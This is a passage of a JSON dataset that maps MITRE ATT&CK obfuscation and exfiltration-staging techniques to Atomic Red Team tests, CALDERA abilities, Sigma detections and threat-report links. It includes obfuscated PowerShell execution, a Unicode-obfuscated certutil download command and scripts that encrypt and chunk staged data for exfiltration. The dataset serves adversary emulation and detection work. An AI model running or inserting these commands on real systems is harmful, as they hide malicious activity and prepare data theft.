-f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "name": "powershell" + } + }, + { + "name": "Obfuscated Command Line using special Unicode characters", + "auto_generated_guid": "e68b945c-52d0-4dd9-a5e8-d173d70c448f", + "description": "This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. \u1da0) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).\nReference:\nhttps://wietze.github.io/blog/windows-command-line-obfuscation\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path/filename to save the dowloaded file to", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "steps": "1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.\n\n\n certutil \u2014\u0af9u\u0af0rl\u08b0ca\u08e2c\u0defhe \u2013\u202espli\u0605t\u202e\u202d \u2212\"\u0d4f\u1da0\u0d78\" #{remote_file} #{local_path}\n\n\n2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.\n", + "name": "manual" + } + } + ] + }, + { + "chain_id": "100001", + "os": "windows", + "parent_process": "[a-z0-9]{1}.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "obfuscation", + "mitre_attack": "T1027", + "itw_sample": "3d77bf4f5d40aa7fff1c59058bf89e0349fa14e3260bbc290b836cbb1e1a17b7" + }, + { + "chain_id": "100123", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "\\*.exe\\:Zone.Identifier:$DATA\" ", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "alternate_data_stream", + "mitre_attack": "T1027", + "itw_sample": "b3c4ae251f8094fa15b510051835c657eaef2a6cea46075d3aec964b14a99f68" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"certutil.exe\" and process_command_line contains \"encode\")or process_command_line contains \"ToBase64String\"", + "name": "Obfuscated Files Or Information" + } + ], + "possible_detections": [ + { + "title": "Executable in ADS", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "status": "experimental", + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "references": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.s0139" + ], + "author": "Florian Roth, @0xrawsec", + "date": "2018/06/03", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Requirements: Sysmon config with Imphash logging activated" + }, + "detection": { + "selection": { + "EventID": 15 + }, + "filter": { + "Imphash": "00000000000000000000000000000000" + }, + "condition": "selection and not filter" + }, + "fields": [ + "TargetFilename", + "Image" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "description": "Detects a ping command that uses a hex encoded IP address", + "references": [ + "https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392" + ], + "author": "Florian Roth", + "date": "2018/03/23", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\ping.exe 0x*", + "*\\ping 0x*" + ] + }, + "condition": "selection" + }, + "fields": [ + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "Windows event logs" + ], + [ + "4663 - File Auditing", + "File monitoring" + ], + [ + "B9", + "Bninary file metadata" + ], + [ + "Malware reverse engineering" + ], + [ + "Environment variable" + ], + [ + "Network protocol analysis" + ], + [ + "Network intrusion", + "detection system" + ], + [ + "Email gateway" + ], + [ + "SSL/TLS inspection" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Bninary file metadata" + ], + [ + "Windows event logs" + ], + [ + "Network protocol analysis" + ], + [ + "Malware reverse engineering" + ], + [ + "Environment variable" + ], + [ + "Network intrusion detection system" + ], + [ + "Email gateway" + ], + [ + "SSL/TLS inspection" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://citizenlab.org/2016/08/group5-syria/", + "https://github.com/danielbohannon/Invoke-Obfuscation", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1030", + "command_list": [ + "cd #{folder_path}; split -b 5000000 T1030_urandom\nls -l #{folder_path}\n", + "cd /tmp/T1030; split -b 5000000 #{file_name}\nls -l /tmp/T1030\n", + "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n" + ], + "commands": [ + { + "command": "cd #{folder_path}; split -b 5000000 T1030_urandom\nls -l #{folder_path}\n", + "source": "atomics/T1030/T1030.yaml", + "name": "Atomic Red Team Test - Data Transfer Size Limits" + }, + { + "command": "cd /tmp/T1030; split -b 5000000 #{file_name}\nls -l /tmp/T1030\n", + "source": "atomics/T1030/T1030.yaml", + "name": "Atomic Red Team Test - Data Transfer Size Limits" + }, + { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "source": "data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml", + "name": "This ability will compress the staged files into a password protected archive and break it\ninto smaller chunks based on the given byte size. The original archive will be automatically\ndeleted. Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n" + }, + { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n", + "source": "data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml", + "name": "This ability will compress the staged files into a password protected archive and break it\ninto smaller chunks based on the given byte size. The original archive will be automatically\ndeleted. Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1030", + "display_name": "Data Transfer Size Limits", + "atomic_tests": [ + { + "name": "Data Transfer Size Limits", + "auto_generated_guid": "ab936c51-10f4-46ce-9144-e02137b2016a", + "description": "Take a file/directory, split it into 5Mb chunks\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_name": { + "description": "File name", + "type": "Path", + "default": "T1030_urandom" + }, + "folder_path": { + "description": "Path where the test creates artifacts", + "type": "Path", + "default": "/tmp/T1030" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "The file must exist for the test to run.", + "prereq_command": "if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1\n" + } + ], + "executor": { + "command": "cd #{folder_path}; split -b 5000000 #{file_name}\nls -l #{folder_path}\n", + "cleanup_command": "if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;\n", + "name": "sh" + } + } + ] + }, + { + "id": "5c5b0392-1daa-45e1-967c-2f361ce78849", + "name": "Compress Staged Directory (Password Protected) and Split Into Smaller Chunks", + "description": "This ability will compress the staged files into a password protected archive and break it\ninto smaller chunks based on the given byte size. The original archive will be automatically\ndeleted. Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1030", + "name": "Data Transfer Size Limits" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "cleanup": "find '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' -exec rm -rf {} \\;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n", + "cleanup": "Get-ChildItem -Path \"$StageDir\\calderachunk*\" | Remove-Item;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", 